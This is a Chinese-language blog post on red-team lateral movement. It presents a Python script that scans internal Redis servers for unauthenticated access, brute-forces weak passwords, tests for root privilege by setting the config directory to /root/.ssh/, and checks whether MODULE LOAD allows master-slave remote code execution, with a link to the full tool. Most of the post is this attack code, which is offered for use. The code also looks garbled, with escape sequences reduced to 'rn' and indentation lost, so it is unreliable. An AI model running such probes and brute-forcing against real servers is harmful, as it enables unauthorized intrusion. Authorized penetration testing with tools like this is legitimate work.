红队测试之redis检测利用脚本

  • A+

背景:
最近在做红队测试,在进入到内网后,通过代理转发出来流量,进行内网扫描,linux内网横移肯定少不了redis服务。
由于代理的性能问题,内网扫描不能动静太大,我比较钟爱msf的portscan模块来扫端口。
那么问题来了,扫出来的redis端口要手动去看能不能利用,心好累。
索性写了一个检测脚本,判断redis是不是未授权,是不是root权限,能不能master-slave rce利用。
脚本内容如下:
先进行未授权检查
```python

未授权检查

def unauth_check(ip, port):

socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
s.send('*1rn$4rnINFOrn'.encode('UTF-8'))
response = s.recv(1024)
if 'NOAUTH Authentication required' in response.decode('UTF-8'):
    print('redis needs authentication!')
    return False
else:
    print('redis unauth!')
    return True

```

需要密码认证的话,进行弱密码爆破,弱密码可以自行扩展

```python
def find_weak_pwd(ip, port):
print('attempt to find weak password:')
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
for pass_ in weak_pass_dict:
s.send(("*2rn$4rnAUTHrn$%srn%srn" %
(len(pass_), pass_)).encode('UTF-8'))
response = s.recv(1024)
if '+OK' in response.decode('utf-8'):
print('存在弱口令,密码:%s' % (pass_))
return pass_
print('weak password not found!')
return False

```

有了访问权限后,接下来检查是否root权限运行

```python
def privilege(ip, port, args):
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
if args:
passwd = args[0]
s.send(('
2rn$4rnAUTHrn$%srn%srn' % (len(passwd), passwd)).encode('utf-8'))
s.send('*4rn$6rnCONFIGrn$3rnSETrn$3rnDIRrn$11rn/root/.ssh/rn'.
encode('UTF-8'))
response = s.recv(1024)
if 'Permission denied' in response.decode('UTF-8'):
print('It's not root permission!')
return False
elif '+OK' in response.decode('UTF-8'):
print('It's root permission!')
return True
else:
print('Detecting permission failed!')
return False

```

没有root权限,不要灰心,还有一招,检查是否能够通过master-slave方式进行RCE

python
def slave_rce(ip, port, *args):
socket.setdefaulttimeout(5)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, int(port)))
if args:
passwd = args[0]
s.send(('*2rn$4rnAUTHrn$%srn%srn' % (len(passwd), passwd)).encode('utf-8'))
s.send('*3rn$6rnMODULErn$4rnLOADrn$3rn123rn'.encode('UTF-8'))
response = s.recv(1024)
if 'ERR unknown command' in response.decode('UTF-8'):
print('It does not support "MODULE" command!')
return False
elif 'Error loading the extension' in response.decode('UTF-8'):
print('You can exploit "Master-Slave RCE"')
return True
else:
print('Detecting slave-rec failed!')
return False

有了一键检测脚本,redis利用起来就方便多了。
完整代码:
https://github.com/aboutbo/tools/blob/master/hack_redis.py

相关推荐: Laravel 8 反序列化分析

forward laravel的版本已经到了8;这里分析一个laravel8的反序列化漏洞,但是让我感到意外的是,这个漏洞竟然在低版本的laravel上依然可以存在,从根本来说这个漏洞是laravel的mockery组件漏洞,没想到一直没修; 本文涉及知识点实…